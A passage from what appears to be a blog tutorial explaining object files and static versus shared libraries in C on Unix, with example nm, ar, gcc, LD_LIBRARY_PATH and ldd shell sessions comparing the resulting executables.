00000000 T print_hello
         U printf
$ nm two.o
00000000 T print_bye
         U printf

This means that there are two symbols (names of functions and variables but not class/structure/type definitions) in each of the files. The ones marked with a "T" are those whose code is actually inside the object files. The ones marked with a "U" are ones which are used but they are "unreferenced" (they are available somewhere outside in some library and they are merely referenced in our object files). Thus the code for print_hello and print_bye can be found inside the respective object files whereas printf is available in some library outside (this is in most cases the C library).

When your actual program using these two object files runs, it will need to find all the symbols that are references and find their definitions in other object files in order to be linked together into a complete program or complete library. An object file is therefore the definitions found in the source file, converted to binary form, and available for placing into a full program.

You can actually go ahead and link together all the object files using a linker into one big mass of goo and add the goo to your program but this is not generally a good way to do this. Instead a better way is to "archive" them up into a library. There are two flavors of archives for libraries: static and dynamic.

A static library (in Unix based systems) is almost always suffixed with .a (eg. libc.a is the core C library, libm.a is the C math library). Let's try building a static library out of our two object files now:

$ ar rc libprint.a one.o two.o

Now let's try running nm on this static library to see what exactly it looks like:

$ nm libprint.a

one.o:
00000000 T print_hello
         U printf

two.o:
00000000 T print_bye
         U printf

It is just a big archive of all the object files with an index entry for each of them (in fact the ar command is short for "archive").

If you link in a static library into an executable it embeds the entire library into the executable. This is just like linking in all the individual .o files. As you can imagine this can make your program very large, especially if you are using (as most modern applications are) a lot of libraries. There is one difference however between linking with a static library and linking with object files. When you link with a static library, only the object files containing functions that we have actually used are compiled (this can be seen by writing a hello world program. The size of the final executable will only be a few kilobytes whereas the core C library is a few megabytes. This is because only the printf is pulled from the static library archive). When linking all the object files directly, unused functions will also creep into the executable making it bloated without reason.

A dynamic or shared library is suffixed with .so. It, like it's static analogue is a large table of object files, referring to all the code compiled. We can create one using:

$ gcc -shared -o libprint.so one.o two.o

Looking at a shared library with nm is quite a bit different than the static library though. On my machine it contains about two dozen symbols only two of which are print_hello and print_bye:

$ nm libhello.so 
000014f0 a _DYNAMIC
000015cc a _GLOBAL_OFFSET_TABLE_
         w _Jv_RegisterClasses
000014e0 d __CTOR_END__
000014dc d __CTOR_LIST__
000014e8 d __DTOR_END__
000014e4 d __DTOR_LIST__
000004d8 r __FRAME_END__
000014ec d __JCR_END__
000014ec d __JCR_LIST__
000015e8 A __bss_start
         w __cxa_finalize@@GLIBC_2.1.3
00000470 t __do_global_ctors_aux
00000390 t __do_global_dtors_aux
000015e0 d __dso_handle
         w __gmon_start__
00000427 t __i686.get_pc_thunk.bx
000015e8 A _edata
000015ec A _end
000004a4 T _fini
0000032c T _init
000015e8 b completed.5754
000003f0 t frame_dummy
000015e4 d p.5752
00000448 T print_bye
0000042c T print_hello
         U printf@@GLIBC_2.0

A shared library differs from a static library in one very important way: it does not embed itself in your final executable. Instead the executable contains a reference to that shared library that is resolved, not at link time, but at run-time. The extra symbols above are needed in order to support this run-time linkage mechanism. While using a shared library mechanism for a small two function library is overkill (it will actually produce bigger executables compared with static linking), the advantages are huge when building more complex libraries. The advantages of dynamic libraries are:

  • Your executable is much smaller. It only contains the code you actually wrote separately in your program. The functions you use from the dynamic library show up as external references and and their code does not go into the binary.
  • You can share (hence the name) one library's parts in multiple executables.
  • You can, if you are careful about compatibility, change the code in the library between runs of the program, and the program will simply pick up the new library without you needing to recompile it.

There are some disadvantages of course:

  • It takes time to link a program together. With shared libraries this time is needed every time the executable runs.
  • The process is more complex. In general though, it is not our headache but the compiler's.
  • You run the risk of incompatibilities between differing versions of the library. This is known as "DLL hell" in Windows.
  • It is generally overkill for a small collection of functions

An Example

Let us continue our above example by adding a third unused function into another object file:

$ cat three.c       # New source file
#include <stdio.h>

void print_boo()
{
    /* Prints scary message to screen */
    printf("Boo!\n");
}
$ gcc -c three.c    # Compile into object file
$ nm three.o        # Check the symbols
00000000 T print_boo
         U puts
$ ar rc libprint.a one.o two.o three.o  # Create a static library
$ cat main.c        # Write sample program that does not use print_boo
int main()
{
    print_hello("Manohar");
    print_bye("Manohar");
}
$ gcc -c main.c    # Compile our program into object file
$ gcc -o print_linked main.o one.o two.o three.o  # Link object files directly
$ ./print_linked 
Hello Manohar!
Goodbye Manohar!
$ gcc -o print_static main.o libprint.a  # Create using static linkage
$ ./print_static 
Hello Manohar!
Goodbye Manohar!

When compiling dynamic libraries, we need to do an extra step and compile source files into position independent code. This way, when the libraries are loaded dynamically, there will be no issues in addressing the symbols in the library. We can do this using the -fPIC option of gcc:

$ gcc -c -fPIC one.c    # Create position independent object file
$ gcc -c -fPIC two.c    # Create position independent object file
$ gcc -c -fPIC three.c    # Create position independent object file
$ gcc -shared -o libprint.so one.o two.o three.o  # Create a dynamic library
$ gcc -c -fPIC main.c    # Create position independent object file
$ gcc -o print_dynamic main.o -lprint -L.  # Create using dynamic linkage
$ ./print_dynamic
./print_dynamic: error while loading shared libraries: libprint.so: No such file or directory

Whoops! Looks like the linker is not searching the current directory for library files. The path is set using the LD_LIBRARY_PATH variable. Let's set it to search the current directory as well:

$ export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
$ ./print_dynamic 
Hello Manohar!
Goodbye Manohar!

Tada! We can confirm the dynamic linking of libraries using the ldd tool (I am guessing it either means "list dynamic dependencies" or "ld dependencies"):

$ ldd ./print_dynamic 
    linux-gate.so.1 =>  (0xb779c000)
    libprint.so => ./libprint.so (0xb7798000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb763b000)
    /lib/ld-linux.so.2 (0xb779d000)
$ ldd ./print_static 
    linux-gate.so.1 =>  (0xb76f6000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7597000)
    /lib/ld-linux.so.2 (0xb76f7000)
$ ldd ./print_linked 
    linux-gate.so.1 =>  (0xb77df000)
    libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7680000)
    /lib/ld-linux.so.2 (0xb77e0000)

We can also try and compare the sizes for each of the executables:

$ ls -l print_*
-rwxr-xr-x 1 mvanga mvanga 4781 Mar 18 02:46 print_dynamic
-rwxr-xr-x 1 mvanga mvanga 4977 Mar 18 02:34 print_linked
-rwxr-xr-x 1 mvanga mvanga 4747 Mar 18 02:45 print_static

As expected, the statically linked print_static is smaller than the one with all object files (print_linked) as the linker didn't add the unecessary, unused code from three.o. Note that the dynamically linked print_dynamic is larger than the statically linked print_static in this case as our library was very small. The overhead exceeds the advantage of dynamic linkage here. With larger libraries, dynamic linking is a great space saver.

Happy Hacking!